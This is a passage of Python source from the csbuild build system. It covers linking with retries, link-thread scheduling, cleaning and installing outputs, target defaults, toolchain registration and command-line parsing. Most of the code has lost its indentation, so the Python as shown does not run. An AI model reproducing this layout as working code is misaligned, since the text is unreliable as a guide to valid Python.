if platform.system() != "Windows":
if os.access(output , os.F_OK):
os.remove( output )
for dep in project.reconciledLinkDepends:
proj = _shared_globals.projects[dep]
if proj.type == ProjectType.StaticLibrary and project.linkMode == StaticLinkMode.LinkIntermediateObjects:
for chunk in proj.chunks:
hasChunk = False
if not proj.unity:
chunkObj = _utils.GetChunkedObjPath(proj, chunk)
else:
chunkObj = _utils.GetUnityChunkObjPath(proj)
if proj.useChunks and not _shared_globals.disable_chunks and os.access(chunkObj , os.F_OK):
objs.append( chunkObj )
hasChunk = True
if not hasChunk or proj.activeToolchain.Compiler().SupportsObjectScraping():
					if isinstance( chunk, list ):
for source in chunk:
obj = _utils.GetSourceObjPath(proj, source)
if os.access(obj , os.F_OK):
objs.append( obj )
elif not hasChunk or proj.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
else:
obj = _utils.GetSourceObjPath(proj, chunk)
if os.access(obj , os.F_OK):
objs.append( obj )
elif not hasChunk or proj.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
objs += proj.extraObjs
cmd = project.activeToolchain.Linker().GetLinkCommand( project, output, objs )
if _shared_globals.show_commands:
print(cmd)
project.linkCommand = cmd
if platform.system() != "Windows":
cmd = shlex.split(cmd)
toolchainEnv = _utils.GetToolchainEnvironment( project.activeToolchain.Linker() )
maxNumRetries = 10
retryCount = 0
while retryCount < maxNumRetries:
try:
fd = subprocess.Popen( cmd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, cwd = project.objDir, env = toolchainEnv )
except PermissionError:
# Sleep for a second before trying again.
time.sleep(1)
retryCount += 1
except:
# Other exceptions will raise normally.
raise
else:
# Successfully launched the process.
break
assert retryCount < maxNumRetries, "Failed to launch process due to PermissionError"
with _shared_globals.spmutex:
_shared_globals.subprocesses[output] = fd
(out, errors) = fd.communicate( )
with _shared_globals.spmutex:
del _shared_globals.subprocesses[output]
if _shared_globals.exiting:
return
ret = fd.returncode
sys.stdout.flush( )
sys.stderr.flush( )
if sys.version_info >= (3, 0):
out = out.decode("utf-8")
errors = errors.decode("utf-8")
out = out.replace("\r", "")
errors = errors.replace("\r", "")
sys.stdout.write( out )
sys.stderr.write( errors )
sys.stdout.flush( )
sys.stderr.flush( )
with project.mutex:
ansi_escape = re.compile(r'\x1b[^m]*m')
stripped_errors = re.sub(ansi_escape, '', errors)
project.linkOutput = out
project.linkErrors = stripped_errors
errorlist = project.activeToolchain.Compiler()._parseOutput(out)
errorlist2 = project.activeToolchain.Compiler()._parseOutput(stripped_errors)
if errorlist is None:
errorlist = errorlist2
elif errorlist2 is not None:
errorlist += errorlist2
errorcount = 0
warningcount = 0
if errorlist:
for error in errorlist:
if error.level == _shared_globals.OutputLevel.ERROR:
errorcount += 1
if error.level == _shared_globals.OutputLevel.WARNING:
warningcount += 1
project.errors += errorcount
project.warnings += warningcount
project.parsedLinkErrors = errorlist
with _shared_globals.sgmutex:
_shared_globals.warningcount += warningcount
_shared_globals.errorcount += errorcount
if ret != 0:
log.LOG_ERROR( "Linking failed." )
return _LinkStatus.Fail
totaltime = time.time( ) - starttime
totalmin = math.floor( totaltime / 60 )
totalsec = math.floor( totaltime % 60 )
log.LOG_LINKER( "Link time: {0}:{1:02}".format( int( totalmin ), int( totalsec ) ) )
return _LinkStatus.Success
class _LinkThread(threading.Thread):
def __init__(self, project, objs):
threading.Thread.__init__( self )
self._project = project
self._objs = objs
#Prevent certain versions of python from choking on dummy threads.
if not hasattr( threading.Thread, "_Thread__block" ):
threading.Thread._Thread__block = _shared_globals.dummy_block( )
def run( self ):
global _linkThreadMutex
global _currentLinkThreads
global _linkCond
global _recheckDeferredLinkTasks
try:
project = self._project
project.state = _shared_globals.ProjectState.LINKING
ret = _performLink(project, self._objs)
if ret == _LinkStatus.Fail:
_shared_globals.build_success = False
project.state = _shared_globals.ProjectState.LINK_FAILED
elif ret == _LinkStatus.Success:
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.postBuildStep, "plugin post-build")
_utils.CheckRunBuildStep(project, project.activeToolchain.postBuildStep, "toolchain post-build")
for buildStep in project.postBuildSteps:
_utils.CheckRunBuildStep(project, buildStep, "project post-build")
project.state = _shared_globals.ProjectState.FINISHED
elif ret == _LinkStatus.UpToDate:
project.state = _shared_globals.ProjectState.UP_TO_DATE
project.endTime = time.time()
log.LOG_BUILD( "Finished {} ({} {}/{})".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
_shared_globals.link_semaphore.release()
with _linkThreadMutex:
_currentLinkThreads.remove(project.key)
with _linkMutex:
_recheckDeferredLinkTasks = True
_linkCond.notify()
except Exception:
traceback.print_exc()
def _linkThreadLoop():
global _linkQueue
global _linkMutex
global _linkCond
global _currentLinkThreads
global _linkThreadMutex
global _recheckDeferredLinkTasks
try:
global _building
deferredLinks = []
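	#Projects whose dependencies are still linking get parked in deferredLinks and are retried
	#whenever a link thread finishes (see _recheckDeferredLinkTasks in _LinkThread.run above).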
while True:
projectsToLink = []
with _linkMutex:
if _recheckDeferredLinkTasks:
if _linkQueue:
_linkQueue += deferredLinks
else:
_linkQueue = deferredLinks
deferredLinks = []
_recheckDeferredLinkTasks = False
if not _linkQueue:
if not _building and not deferredLinks and not _currentLinkThreads:
return
_linkQueue = deferredLinks
deferredLinks = []
_linkCond.wait()
projectsToLink = _linkQueue
_linkQueue = []
for ( project, objs ) in projectsToLink:
okToLink = True
with _linkThreadMutex:
for depend in project.reconciledLinkDepends:
if depend in _currentLinkThreads:
okToLink = False
break
for ( otherProj, otherObjs ) in projectsToLink:
if otherProj.key == depend:
okToLink = False
break
if not okToLink:
break
if okToLink:
with _linkThreadMutex:
_currentLinkThreads.add(project.key)
_shared_globals.link_semaphore.acquire(True)
_LinkThread(project, objs).start()
else:
deferredLinks.append( ( project, objs ) )
except Exception:
traceback.print_exc()
_linkThread = threading.Thread(target=_linkThreadLoop)
def _clean( silent = False ):
"""
Cleans the project.
Invoked with --clean or --rebuild.
Deletes all of the object files to make sure they're rebuilt cleanly next run.
"""
for project in _shared_globals.sortedProjects:
if not silent:
log.LOG_BUILD( "Cleaning {} ({} {}/{})...".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
# Delete any chunks in the current project.
for chunk in project.chunks:
if not project.unity:
obj = _utils.GetChunkedObjPath(project, chunk)
else:
obj = _utils.GetUnityChunkObjPath(project)
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
		# Individual source files may not be in the chunks list, so to be safe, delete any single-source-file objects that may exist as well.
for source in project.sources:
obj = _utils.GetSourceObjPath(project, source)
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Delete the project's C++ precompiled header.
headerfile = os.path.join(project.csbuildDir, "{}_cpp_precompiled_headers_{}.hpp".format(
project.outputName.split( '.' )[0],
project.targetName ) )
obj = project.activeToolchain.Compiler().GetPchFile( headerfile )
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Delete the project's C precompiled header.
headerfile = os.path.join(project.csbuildDir, "{}_c_precompiled_headers_{}.h".format(
project.outputName.split( '.' )[0],
project.targetName ))
obj = project.activeToolchain.Compiler().GetPchFile( headerfile )
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Delete the project's output directory.
outpath = os.path.join( project.outputDir, project.outputName )
if os.access(outpath , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {}".format( outpath ) )
os.remove( outpath )
def _installHeaders( ):
log.LOG_INSTALL("Installing headers...")
installed_headers = set()
for project in _shared_globals.sortedProjects:
os.chdir( project.workingDirectory )
#install headers
subdir = project.headerInstallSubdir
if not subdir:
subdir = _utils.GetBaseName( project.outputName )
if project.installHeaders:
incdir = _utils.ResolveProjectMacros(_shared_globals.install_incdir, project)
install_dir = os.path.join( incdir, subdir )
if not os.access(install_dir , os.F_OK):
os.makedirs( install_dir )
headers = []
cHeaders = []
project.get_files( headers = headers, cHeaders = cHeaders )
for header in (headers + cHeaders):
this_header_dir = os.path.dirname( os.path.join( install_dir, os.path.relpath( header, project.workingDirectory ) ) )
this_header = os.path.join( this_header_dir, header )
if this_header in installed_headers:
continue
installed_headers.add(this_header)
if not os.access(this_header_dir , os.F_OK):
os.makedirs( this_header_dir )
log.LOG_INSTALL( "Installing {0} to {1}...".format( header, this_header_dir ) )
shutil.copy( header, this_header_dir )
install_something = True
def _installOutput( ):
log.LOG_INSTALL("Installing output...")
for project in _shared_globals.sortedProjects:
os.chdir( project.workingDirectory )
output = os.path.join( project.outputDir, project.outputName )
install_something = False
if project.installOutput:
#install output file
if os.access(output , os.F_OK):
outputDir = _utils.ResolveProjectMacros(_shared_globals.install_libdir, project)
if not os.access(outputDir , os.F_OK):
os.makedirs( outputDir )
log.LOG_INSTALL( "Installing {0} to {1}...".format( output, outputDir ) )
shutil.copy( output, outputDir )
pdb = output.rsplit(".", 1)[0] + ".pdb"
if os.access(pdb , os.F_OK):
log.LOG_INSTALL( "Installing {0} to {1}...".format( pdb, outputDir ) )
shutil.copy( pdb, outputDir )
install_something = True
else:
log.LOG_ERROR( "Output file {0} does not exist! You must build without --install first.".format( output ) )
def _install( ):
"""
Installer.
Invoked with --install.
Installs the generated output file and/or header files to the specified directory.
Does nothing if neither InstallHeaders() nor InstallOutput() has been called in the make script.
"""
_installHeaders()
_installOutput()
def _make( ):
"""
Performs both the build and link steps of the process.
Aborts if the build fails.
"""
for project in _shared_globals.sortedProjects:
log.LOG_BUILD( "Verifying libraries for {} ({} {}/{})".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
if not project.check_libraries( ):
Exit( 1 )
if not _build( ):
_shared_globals.build_success = False
log.LOG_ERROR( "Build failed." )
else:
log.LOG_BUILD( "Build complete." )
def AddScript( incFile ):
"""
Include the given makefile script as part of this build process.
.. attention:: The included file will be loaded in the **current** file's namespace, not a new namespace.
This doesn't work the same way as importing a module. Any functions or variables defined in the current module
will be available to the called script, and anything defined in the called script will be available to the
calling module after it's been called. As a result, this can be used much like #include in C++ to pull in
utility scripts in addition to calling makefiles. The result is essentially as if the called script were
copied and pasted directly into this one in the location of the AddScript() call.
:type incFile: str
:param incFile: path to an additional makefile script to call as part of this build
"""
	incFile = os.path.abspath( incFile )
	path = os.path.dirname( incFile )
wd = os.getcwd( )
os.chdir( path )
scriptFiles.append(incFile)
_execfile( incFile, _shared_globals.makefile_dict, _shared_globals.makefile_dict )
del scriptFiles[-1]
os.chdir( wd )
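#Example usage (hypothetical makefile; assumes "common.csbuild" defines ApplyCommonSettings()):
#
#	csbuild.AddScript( "common.csbuild" )
#	ApplyCommonSettings()   #visible here because the included script shares this file's namespace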
def SetupDebugTarget( ):
"""Default debug target."""
if not projectSettings.currentProject._optLevel_set:
SetOptimizationLevel( OptimizationLevel.Disabled )
if not projectSettings.currentProject._debugLevel_set:
SetDebugLevel( DebugLevel.EmbeddedSymbols )
Toolchain("msvc").SetDebugLevel( DebugLevel.ExternalSymbols )
if not projectSettings.currentProject.linkModeSet:
Toolchain("msvc").SetStaticLinkMode( StaticLinkMode.LinkIntermediateObjects )
AddDefines("_DEBUG")
if not projectSettings.currentProject._outputDir_set:
s = _utils.FixupRelativePath( "{project.activeToolchainName}-{project.outputArchitecture}-{project.targetName}" )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.outputDirTemp = s
if not projectSettings.currentProject._objDir_set:
s = _utils.FixupRelativePath( os.path.join( projectSettings.currentProject.outputDirTemp.path, "obj") )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.objDirTemp = s
if not projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime_set:
projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime = True
def SetupReleaseTarget( ):
"""Default release target."""
if not projectSettings.currentProject._optLevel_set:
SetOptimizationLevel( OptimizationLevel.Max )
if not projectSettings.currentProject._debugLevel_set:
SetDebugLevel( DebugLevel.Disabled )
Toolchain("msvc").SetDebugLevel( DebugLevel.ExternalSymbols )
AddDefines("NDEBUG")
if not projectSettings.currentProject._outputDir_set:
s = _utils.FixupRelativePath( "{project.activeToolchainName}-{project.outputArchitecture}-{project.targetName}" )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.outputDirTemp = s
if not projectSettings.currentProject._objDir_set:
s = _utils.FixupRelativePath( os.path.join(projectSettings.currentProject.outputDirTemp.path, "obj") )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.objDirTemp = s
if not projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime_set:
projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime = False
def _setupdefaults( ):
if platform.system() == "Darwin":
gccCompiler, gccLinker = toolchain_gcc_darwin.GccCompilerDarwin, toolchain_gcc_darwin.GccLinkerDarwin
else:
gccCompiler, gccLinker = toolchain_gcc.GccCompiler, toolchain_gcc.GccLinker
RegisterToolchain( "gcc", gccCompiler, gccLinker )
RegisterToolchain( "msvc", toolchain_msvc.MsvcCompiler, toolchain_msvc.MsvcLinker )
RegisterToolchain( "android", toolchain_android.AndroidCompiler, toolchain_android.AndroidLinker, apkBuilder = toolchain_android.APKBuilder )
RegisterToolchain( "ios", toolchain_ios.iOSCompiler, toolchain_ios.iOSLinker )
try:
# Attempt to register the PS4 toolchain.
RegisterToolchain( "ps4", toolchain_ps4.Ps4Compiler, toolchain_ps4.Ps4Linker )
RegisterToolchain( "wiiu", toolchain_wiiu.WiiUCompiler, toolchain_wiiu.WiiULinker )
except:
pass
RegisterProjectGenerator( "qtcreator", project_generator_qtcreator.project_generator_qtcreator )
RegisterProjectGenerator( "visualstudio", project_generator_visual_studio_v2.project_generator_visual_studio )
#TODO: SlickEdit project generation is disabled until we get it fixed up.
#RegisterProjectGenerator( "slickedit", project_generator_slickedit.project_generator_slickedit )
if platform.system( ) == "Windows":
SetActiveToolchain( "msvc" )
else:
SetActiveToolchain( "gcc" )
target( "debug" )( SetupDebugTarget )
target( "release" )( SetupReleaseTarget )
_guiModule = None
sysExit = sys.exit
def Done( code = 0, killGui = True ):
"""
Exit the build process early
:param code: Exit code to exit with
:type code: int
:param killGui: Whether to immediately kill the GUI or wait for the user to close it, if it's active
:type killGui: bool
"""
Exit( code, killGui )
def Exit( code = 0, killGui = True ):
"""
Exit the build process early
:param code: Exit code to exit with
:type code: int
:param killGui: Whether to immediately kill the GUI or wait for the user to close it, if it's active
:type killGui: bool
"""
_shared_globals.exiting = True
global _building
_building = False
if not imp.lock_held():
imp.acquire_lock()
with _shared_globals.spmutex:
for output, fd in _shared_globals.subprocesses.items():
log.LOG_BUILD("Killing process {} creating file '{}'".format(fd.pid, os.path.basename(output)))
try:
fd.kill()
except OSError:
pass
if os.path.exists(output):
log.LOG_BUILD("Removing incomplete/partially-created file '{}'".format(fd.pid, os.path.basename(output)))
os.remove(output)
global _guiModule
if _guiModule:
if killGui:
log.LOG_BUILD("Killing GUI")
_guiModule.stop()
_guiModule.join()
#Die hard, we don't need python to clean up and we want to make sure this exits.
#sys.exit just throws an exception that can be caught. No catching allowed.
os._exit( code )
ARG_NOT_SET = type( "ArgNotSetType", (), { } )( )
_options = []
def GetOption( option ):
"""
Retrieve the given option from the parsed command line arguments.
:type option: str
:param option: The name of the option, without any preceding dashes.
ArgParse replaces dashes with underscores, but csbuild will accept dashes and automatically handle the conversion
internally.
:return: The given argument, if it exists. If the argument has never been specified, returns csbuild.ARG_NOT_SET.
If --help has been specified, this will ALWAYS return csbuild.ARG_NOT_SET for user-specified arguments.
Handle csbuild.ARG_NOT_SET to prevent code from being unintentionally run with --help.
"""
global args
if _runMode != RunMode.Help:
newparser = argparse.ArgumentParser( )
global _options
for opt in _options:
newparser.add_argument( *opt[0], **opt[1] )
_options = []
newargs, remainder = newparser.parse_known_args( args.remainder )
args.__dict__.update( newargs.__dict__ )
args.remainder = remainder
option = option.replace( "-", "_" )
if hasattr( args, option ):
return getattr( args, option )
else:
return ARG_NOT_SET
def AddOption( *args, **kwargs ):
"""
Adds an option to the argument parser.
The syntax for this is identical to the ArgParse add_argument syntax; see
the :argparse: documentation
"""
_options.append( [args, kwargs] )
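#Example (hypothetical makefile): declaring a custom flag with AddOption and reading it back with GetOption.
#
#	csbuild.AddOption( "--flavor", action = "store", default = "vanilla", help = "Build flavor" )
#	flavor = csbuild.GetOption( "flavor" )
#	if flavor is not csbuild.ARG_NOT_SET:   #GetOption always returns ARG_NOT_SET under --help
#		csbuild.AddDefines( "FLAVOR_{}".format( flavor.upper() ) )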
def GetArgs( ):
"""
Gets all of the arguments parsed by the argument parser.
:return: an argparse.Namespace object
:rtype: argparse.Namespace
"""
global args
if _runMode != RunMode.Help:
newparser = argparse.ArgumentParser( )
global _options
for opt in _options:
newparser.add_argument( *opt[0], **opt[1] )
_options = []
newargs, remainder = newparser.parse_known_args( args.remainder )
args.__dict__.update( newargs.__dict__ )
args.remainder = remainder
return vars( args )
def GetArgDefault( argname ):
"""
Gets the default argument for the requested option
:type argname: str
:param argname: the name of the option
"""
global parser
return parser.get_default( argname )
def GetTargetList():
"""
Get the list of targets currently being built.
If no target has been specified (the default is being used), this list is empty.
:return: The list of targets
:rtype: list[str]
"""
return _shared_globals.target_list
def GetRunMode():
"""
Get the mode csbuild is current running under.
:return: The run mode.
:rtype: int
"""
return _runMode
class _dummy( object ):
def __setattr__( self, key, value ):
pass
def __getattribute__( self, item ):
return ""
def _execfile( file, glob, loc ):
# Save the current value of __file__ and set it to the input file path.
oldFileVar = glob.get("__file__", None)
glob["__file__"] = file
with open( file, "r" ) as f:
exec(compile(f.read( ), file, "exec"), glob, loc)
	# Restore the previous state of the __file__ variable.
	if oldFileVar is not None:
		glob["__file__"] = oldFileVar
	else:
		del glob["__file__"]
mainFile = ""
mainFileDir = ""
def _run( ):
_setupdefaults( )
#Initialized here to avoid a circular dependency
_shared_globals.globalPreMakeSteps = _utils.OrderedSet()
_shared_globals.globalPostMakeSteps = _utils.OrderedSet()
global args
args = _dummy( )
global mainFile
global mainFileDir
mainFile = sys.modules['__main__'].__file__
if mainFile is not None:
mainFileDir = os.path.abspath( os.path.dirname( mainFile ) )
if mainFileDir:
os.chdir( mainFileDir )
mainFile = os.path.basename( os.path.abspath( mainFile ) )
else:
mainFileDir = os.path.abspath( os.getcwd( ) )
scriptFiles.append(os.path.join(mainFileDir, mainFile))
if "-h" in sys.argv or "--help" in sys.argv:
global _runMode
_runMode = RunMode.Help
_execfile( mainFile, _shared_globals.makefile_dict, _shared_globals.makefile_dict )
_shared_globals.sortedProjects = _utils.SortProjects( _shared_globals.tempprojects )
else:
log.LOG_ERROR( "CSB cannot be run from the interactive console." )
Exit( 1 )
csbDir = os.path.join(mainFileDir, ".csbuild")
if not os.path.exists(csbDir):
os.makedirs(csbDir)
_shared_globals.cacheDirectory = os.path.join(csbDir, "cache")
if not os.path.exists(_shared_globals.cacheDirectory):
os.makedirs(_shared_globals.cacheDirectory)
logDirectory = os.path.join(csbDir, "log")
if not os.path.exists(logDirectory):
os.makedirs(logDirectory)
logFile = os.path.join(logDirectory, "build.log")
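	#Rotate the previous logs: build.log -> build.log.1 -> ... -> build.log.4, discarding the oldest.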
logBackup = "{}.4".format(logFile)
if os.path.exists(logBackup):
os.remove(logBackup)
for i in range(3,0,-1):
logBackup = "{}.{}".format(logFile, i)
if os.path.exists(logBackup):
newBackup = "{}.{}".format(logFile, i+1)
os.rename(logBackup, newBackup)
if os.path.exists(logFile):
logBackup = "{}.1".format(logFile)
os.rename(logFile, logBackup)
_shared_globals.logFile = open(logFile, "w")
epilog = " ------------------------------------------------------------ \n\nProjects available in this makefile (listed in build order):\n\n"
projtable = [[]]
i = 1
j = 0
maxcols = min( math.floor( len( _shared_globals.sortedProjects ) / 4 ), 4 )
for proj in _shared_globals.sortedProjects:
projtable[j].append( proj.name )
if i < maxcols:
i += 1
else:
projtable.append( [] )
i = 1
j += 1
if projtable:
maxlens = [15] * len( projtable[0] )
for index in range( len( projtable ) ):
col = projtable[index]
for subindex in range( len( col ) ):
maxlens[subindex] = max( maxlens[subindex], len( col[subindex] ) )
for index in range( len( projtable ) ):
col = projtable[index]
for subindex in range( len( col ) ):
item = col[subindex]
epilog += " "
epilog += item
for space in range( maxlens[subindex] - len( item ) ):
epilog += " "
epilog += " "
epilog += "\n"
epilog += "\nTargets available in this makefile:\n\n"
targtable = [[]]
i = 1
j = 0
maxcols = min( math.floor( len( _shared_globals.alltargets ) / 4 ), 4 )
for targ in _shared_globals.alltargets:
targtable[j].append( targ )
if i < maxcols:
i += 1
else:
targtable.append( [] )
i = 1
j += 1
if targtable:
maxlens = [15] * len( targtable[0] )
for index in range( len( targtable ) ):
col = targtable[index]
for subindex in range( len( col ) ):
maxlens[subindex] = max( maxlens[subindex], len( col[subindex] ) )
for index in range( len( targtable ) ):
col = targtable[index]
for subindex in range( len( col ) ):
item = col[subindex]
epilog += " "
epilog += item
for space in range( maxlens[subindex] - len( item ) ):
epilog += " "
epilog += " "
epilog += "\n"
global parser
parser = argparse.ArgumentParser(
prog = mainFile, epilog = epilog, formatter_class = argparse.RawDescriptionHelpFormatter )
group = parser.add_mutually_exclusive_group( )
group.add_argument( '-t', '--target', action='append', help = 'Target(s) for build', default=[])
group.add_argument( '--at', "--all-targets", action = "store_true", help = "Build all targets" )
parser.add_argument(
"-p",
"--project",
action = "append",
help = "Build only the specified project. May be specified multiple times."
)
group = parser.add_mutually_exclusive_group( )
group.add_argument( '-c', '--clean', action = "store_true", help = 'Clean the target build' )
group.add_argument( '--install', action = "store_true", help = 'Install the target build' )
group.add_argument( '--install-headers', action = "store_true", help = 'Install only headers for the target build' )
group.add_argument( '--install-output', action = "store_true", help = 'Install only the output for the target build' )
group.add_argument( '--version', action = "store_true", help = "Print version information and exit" )
group.add_argument( '-r', '--rebuild', action = "store_true", help = 'Clean the target build and then build it' )
group2 = parser.add_mutually_exclusive_group( )
group2.add_argument( '-v', '--verbose', action = "store_const", const = 0, dest = "quiet",
help = "Verbose. Enables additional INFO-level logging.", default = 1 )
group2.add_argument( '-q', '--quiet', action = "store_const", const = 2, dest = "quiet",
help = "Quiet. Disables all logging except for WARN and ERROR.", default = 1 )
group2.add_argument( '-qq', '--very-quiet', action = "store_const", const = 3, dest = "quiet",
help = "Very quiet. Disables all csb-specific logging.", default = 1 )
parser.add_argument( "-j", "--jobs", action = "store", dest = "jobs", type = int, help = "Number of simultaneous build processes" )
parser.add_argument(
"-l",
"--linker-jobs",
action = "store",
dest = "linker_jobs",
type = int,
help = "Max number of simultaneous link processes. (If not specified, same value as -j.)"
"Note that this pool is shared with build threads, and linker will only get one thread from the pool until compile threads start becoming free."
"This value only specifies a maximum."
)
parser.add_argument( "-g", "--gui", action = "store_true", dest = "gui", help = "Show GUI while building (experimental)")
parser.add_argument( "--auto-close-gui", action = "store_true", help = "Automatically close the gui on build success (will stay open on failure)")
parser.add_argument("--profile", action="store_true", help="Collect detailed line-by-line profiling information on compile time. --gui option required to see this information.")
parser.add_argument( '--show-commands', help = "Show all commands sent to the system.", action = "store_true" )
parser.add_argument( '--force-color', help = "Force color on or off.",
action = "store", choices = ["on", "off"], default = None, const = "on", nargs = "?" )
parser.add_argument( '--force-progress-bar', help = "Force progress bar on or off.",
action = "store", choices = ["on", "off"], default = None, const = "on", nargs = "?" )
parser.add_argument( '--prefix', help = "install prefix (default /usr/local)", action = "store" )
parser.add_argument( '--libdir', help = "install location for libraries (default {prefix}/lib)", action = "store" )
	parser.add_argument( '--incdir', help = "install location for headers (default {prefix}/include)", action = "store" )
group = parser.add_mutually_exclusive_group( )
group.add_argument( '-o', '--toolchain', help = "Toolchain to use for compiling.",
choices = _shared_globals.alltoolchains, default=[], action = "append" )
group.add_argument( "--ao", '--all-toolchains', help="Build with all toolchains", action = "store_true" )
group = parser.add_mutually_exclusive_group( )
for toolchainName, toolchainArchStrings in _shared_globals.allToolchainArchStrings.items():
archStringLong = "--" + toolchainArchStrings[0]
archStringShort = "--" + toolchainArchStrings[1]
parser.add_argument(archStringLong, archStringShort, help = "Architecture to compile for the {} toolchain.".format(toolchainName), action = "append")
group.add_argument("-a", "--architecture", "--arch", help = 'Architecture to compile for each toolchain.', action = "append")
group.add_argument("--aa", "--all-architectures", "--all-arch", action = "store_true", help = "Build all architectures supported by this toolchain" )
parser.add_argument(
"--stop-on-error",
help = "Stop compilation after the first error is encountered.",
action = "store_true"
)
parser.add_argument( '--no-precompile', help = "Disable precompiling globally, affects all projects",
action = "store_true" )
parser.add_argument( '--no-chunks', help = "Disable chunking globally, affects all projects",
action = "store_true" )
parser.add_argument( '--dg', '--dependency-graph', help="Generate dependency graph", action="store_true")
parser.add_argument( '--with-libs', help="Include linked libraries in dependency graph", action="store_true" )
parser.add_argument( "-d", "--define", help = "Add defines to each project being built.", action = "append")
group = parser.add_argument_group( "Solution generation", "Commands to generate a solution" )
group.add_argument( '--generate-solution', help = "Generate a solution file for use with the given IDE.",
choices = _shared_globals.allgenerators.keys( ), action = "store" )
group.add_argument( '--solution-path',
help = "Path to output the solution file (default is ./Solutions/<solutiontype>)", action = "store",
default = "" )
group.add_argument( '--solution-name', help = "Name of solution output file (default is csbuild)", action = "store",
default = "csbuild" )
group.add_argument( '--solution-args', help = 'Arguments passed to the build script executed by the solution',
action = "store", default = "")
#TODO: Additional args here
for chain in _shared_globals.alltoolchains.items( ):
chainInst = chain[1]()
argfuncs = set()
for tool in chainInst.tools.values():
if(
hasattr(tool.__class__, "AdditionalArgs")
and tool.__class__.AdditionalArgs != toolchain.compilerBase.AdditionalArgs
and tool.__class__.AdditionalArgs != toolchain.linkerBase.AdditionalArgs
):
argfuncs.add(tool.__class__.AdditionalArgs)
if argfuncs:
group = parser.add_argument_group( "Options for toolchain {}".format( chain[0] ) )
for func in argfuncs:
func( group )
for gen in _shared_globals.allgenerators.items( ):
if gen[1].AdditionalArgs != project_generator.project_generator.AdditionalArgs:
group = parser.add_argument_group( "Options for solution generator {}".format( gen[0] ) )
gen[1].AdditionalArgs( group )
if _options:
group = parser.add_argument_group( "Local makefile options" )
for option in _options:
group.add_argument( *option[0], **option[1] )
args, remainder = parser.parse_known_args( )
args.remainder = remainder
# Note:
# The reason for this line of code is that the import lock, in the way that CSBuild operates, prevents
# us from being able to call subprocess.Popen() or any other process execution function other than os.popen().
# This exists to prevent multiple threads from importing at the same time, so... Within csbuild, never import
# within any thread but the main thread. Any import statements used by threads should be in the module those
# thread objects are defined in so they're completed in full on the main thread before that thread starts.
#
# After this point, the LOCK IS RELEASED. Importing is NO LONGER THREAD-SAFE. DON'T DO IT.
if imp.lock_held():
imp.release_lock()
if args.version:
print("CSBuild version {}".format( __version__ ))
print(__copyright__)
print("Code by {}".format( __author__ ))
print("Additional credits: {}".format( ", ".join( __credits__ ) ))
print("\nMaintainer: {} - {}".format( __maintainer__, __email__ ))
return
# Add any defines that were passed in from the command line.
if args.define:
for define in args.define:
AddDefines(define)
_shared_globals.CleanBuild = args.clean
_shared_globals.do_install = args.install or args.install_headers or args.install_output
_shared_globals.quiet = args.quiet
_shared_globals.show_commands = args.show_commands
_shared_globals.rebuild = args.rebuild or args.profile
if args.gui and _shared_globals.CleanBuild:
log.LOG_INFO("The GUI is currently disabled when performing a clean.")
args.gui = False
if args.profile and not args.gui:
log.LOG_WARN("Profile mode has no effect without --gui. Disabling --profile.")
args.profile = False
if args.profile and not args.rebuild:
log.LOG_WARN("A full build is required to collect profiling information. Forcing --rebuild flag.")
project_build_list = None
if args.project:
project_build_list = set( args.project )
if args.force_color == "on":
_shared_globals.color_supported = True
elif args.force_color == "off":
_shared_globals.color_supported = False
_shared_globals.forceProgressBar = args.force_progress_bar
if args.prefix:
_shared_globals.install_prefix = os.path.abspath(args.prefix)
if args.libdir:
_shared_globals.install_libdir = args.libdir
if args.incdir:
_shared_globals.install_incdir = args.incdir
#This allows a first pass to pick up prefix, while keeping project macros for a later pass.
class DummyProj(object):
def __getattr__(self, name):
return "{{project.{}}}".format(name)
proj = DummyProj()
_shared_globals.install_libdir = os.path.abspath(_shared_globals.install_libdir.format(prefix=_shared_globals.install_prefix, project=proj))
_shared_globals.install_incdir = os.path.abspath(_shared_globals.install_incdir.format(prefix=_shared_globals.install_prefix, project=proj))
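	#e.g. an install_libdir of "{prefix}/lib/{project.name}" becomes "/usr/local/lib/{project.name}" here
	#(with the default prefix); the surviving {project.name} macro is resolved per-project later by
	#_utils.ResolveProjectMacros().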
if args.jobs:
_shared_globals.max_threads = args.jobs
_shared_globals.semaphore = threading.BoundedSemaphore( value = _shared_globals.max_threads )
if args.linker_jobs:
_shared_globals.max_linker_threads = max(args.linker_jobs, _shared_globals.max_threads)
_shared_globals.link_semaphore = threading.BoundedSemaphore( value = _shared_globals.max_linker_threads )
_shared_globals.profile = args.profile
_shared_globals.disable_chunks = args.no_chunks
_shared_globals.disable_precompile = args.no_precompile or args.profile
_shared_globals.stopOnError = args.stop_on_error
if args.generate_solution is not None:
_runMode = RunMode.GenerateSolution
args.at = True
args.aa = True
#args.ao = True
if args.at:
_shared_globals.target_list = list(_shared_globals.alltargets)
elif args.target:
_shared_globals.target_list = args.target
	#There's an _execfile of this file up above, but if we got this far we didn't pass --help or -h, so we need to do it here instead.
_execfile( mainFile, _shared_globals.makefile_dict, _shared_globals.makefile_dict )
parser.parse_args(args.remainder)
validArchList = set()
if args.ao:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
